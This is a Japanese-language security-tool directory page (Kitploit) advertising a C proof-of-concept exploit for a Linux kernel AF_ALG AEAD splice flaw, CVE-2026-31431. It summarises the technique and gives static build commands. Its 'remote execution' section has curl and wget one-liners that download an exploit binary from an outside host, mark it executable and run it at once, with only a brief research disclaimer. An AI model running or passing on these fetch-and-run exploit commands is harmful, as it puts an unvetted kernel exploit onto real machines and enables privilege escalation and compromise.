Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-31431 — Cポート版の概念実証で、LinuxカーネルのAF_ALG AEADスプライスロジックの欠陥(CVE-2026-31431)を悪用するもので、教育研究用です。 | Kitploit
ツール/GitHubGitHub/offsecguy/cve-2026-31431
脆弱性分析エクスプロイトバイナリエクスプロイト
GitHuboffsecguy/cve-2026-31431

CVE-2026-31431

Cポート版の概念実証で、LinuxカーネルのAF_ALG AEADスプライスロジックの欠陥(CVE-2026-31431)を悪用するもので、教育研究用です。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

copy.fail — AF_ALG AEAD splice プリミティブ (CVE-2026-31431)

概要

このプロジェクトは、offsecguy によるオリジナルの Python プロトタイプの C 移植版です。
Linux カーネル暗号 API(AF_ALG)を以下の方法で活用します:

  • authencesn(hmac(sha256),cbc(aes)) AEAD モード
  • MSG_MORE フラグ
  • splice() システムコール

この手法は、読み取り専用ファイルディスクリプタ からのデータを暗号ソケットに通し、チャンク単位で処理します。


⚙️ コンパイル

オプション 1 — musl(静的ビルド)

root@kitploit:~
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

オプション 2 — GCC 静的

root@kitploit:~
gcc exp.c -o exp -lz -s -static

オプション 3 — GCC 動的

root@kitploit:~
gcc exp.c -o exp -lz -s

🚀 リモート実行

root@kitploit:~
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
root@kitploit:~
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ 注意事項

  • Linux カーネルが AF_ALG をサポートしている必要があります
  • 解凍に zlib を使用します
  • 低レベルのカーネル暗号操作と実験用に設計されています

免責事項

このコードは教育および研究目的のみで提供されています。
責任を持って、テストを許可されたシステム上でのみ使用してください。

ツールをダウンロード